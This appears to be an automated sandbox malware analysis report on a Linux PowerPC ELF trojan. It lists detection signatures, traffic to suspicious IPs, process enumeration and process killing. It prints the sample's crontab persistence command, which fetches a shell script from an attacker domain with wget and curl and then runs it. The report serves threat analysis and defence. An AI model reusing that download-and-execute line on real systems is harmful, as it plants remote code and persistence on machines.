Linux Analysis Report
ppc.elf

Overview

General Information

Sample name: ppc.elf
Analysis ID: 1541143
MD5: 0b7d29b9cd26113d2540ce43f07a2043
SHA1: be337137f850b55d14a9b547d890238d478dc5fa
SHA256: a782bcfea22e233256ec6f536cc5f06d007dac34b1bdb37f56b75913cc9013b3
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 56
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

barindex
Source: ppc.elf ReversingLabs: Detection: 18%
Source: tmp.gfYg0o.19.dr String: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: global traffic TCP traffic: 192.168.2.23:53722 -> 81.29.149.178:9896
Source: global traffic TCP traffic: 192.168.2.23:40708 -> 194.87.198.29:17173
Source: global traffic TCP traffic: 192.168.2.23:37896 -> 91.149.218.232:15905
Source: /tmp/ppc.elf (PID: 6211) Socket: 127.0.0.1:1172 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknown TCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown UDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknown UDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknown UDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknown UDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknown UDP traffic detected without corresponding DNS query: 194.36.144.87
Source: global traffic DNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: tmp.gfYg0o.19.dr String found in binary or memory: http://hailcocks.ru/wget.sh;
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33606
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample .symtab present: no
Source: /tmp/ppc.elf (PID: 6275) SIGKILL sent: pid: 6367, result: no such process Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) SIGKILL sent: pid: 6367, result: successful Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) SIGKILL sent: pid: 6368, result: successful Jump to behavior
Source: classification engine Classification label: mal56.troj.linELF@0/1@5/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6219) Crontab executable: /usr/bin/crontab -> crontab -l Jump to behavior
Source: /bin/sh (PID: 6218) Crontab executable: /usr/bin/crontab -> crontab - Jump to behavior
Source: /usr/bin/crontab (PID: 6218) File: /var/spool/cron/crontabs/tmp.gfYg0o Jump to behavior
Source: /usr/bin/crontab (PID: 6218) File: /var/spool/cron/crontabs/root Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6351/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6373/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6350/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6372/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6353/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6375/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6275/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6352/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6374/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6355/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6377/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6277/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6354/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/4331/cmdline Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6376/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6357/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6038/cmdline Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6379/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6356/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6378/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6371/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6370/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6348/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6347/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6369/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6349/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6362/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6384/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6361/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6383/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6386/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6385/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6388/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6387/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6346/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6368/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6345/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6367/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6380/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6360/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6382/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6381/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6359/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6221) File opened: /proc/6358/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6351/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6373/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6350/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6372/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6353/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6375/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6352/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6374/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6355/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6377/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6354/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/4331/cmdline Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/4331/cmdline Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6376/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6357/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6038/cmdline Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6379/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6356/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6378/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6371/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6370/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6348/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6347/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6369/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6349/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6362/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6384/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6361/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6383/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6386/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6385/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6388/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6387/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6346/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6368/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6345/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6367/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6380/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6360/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6382/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6381/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6359/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6275) File opened: /proc/6358/status Jump to behavior
Source: /tmp/ppc.elf (PID: 6213) Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" Jump to behavior
Source: /usr/bin/dash (PID: 6367) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Tjs0sEmo3a /tmp/tmp.K00P5cWEpn /tmp/tmp.ZeekXPAEm7 Jump to behavior
Source: /usr/bin/dash (PID: 6368) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Tjs0sEmo3a /tmp/tmp.K00P5cWEpn /tmp/tmp.ZeekXPAEm7 Jump to behavior
Source: submitted sample Stderr: no crontab for root: exit code = 0
Source: /tmp/ppc.elf (PID: 6211) Queries kernel information via 'uname': Jump to behavior
Source: ppc.elf, 6211.1.00007ffe6972e000.00007ffe6974f000.rw-.sdmp, ppc.elf, 6220.1.00007ffe6972e000.00007ffe6974f000.rw-.sdmp Binary or memory string: |7x86_64/usr/bin/qemu-ppc/tmp/ppc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/ppc.elf
Source: ppc.elf, 6211.1.0000558c73c0a000.0000558c73cdf000.rw-.sdmp, ppc.elf, 6220.1.0000558c73c0a000.0000558c73cdf000.rw-.sdmp Binary or memory string: !/etc/qemu-binfmt/ppc1
Source: ppc.elf, 6211.1.0000558c73c0a000.0000558c73cdf000.rw-.sdmp, ppc.elf, 6220.1.0000558c73c0a000.0000558c73cdf000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/ppc
Source: ppc.elf, 6211.1.00007ffe6972e000.00007ffe6974f000.rw-.sdmp, ppc.elf, 6220.1.00007ffe6972e000.00007ffe6974f000.rw-.sdmp Binary or memory string: /usr/bin/qemu-ppc
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs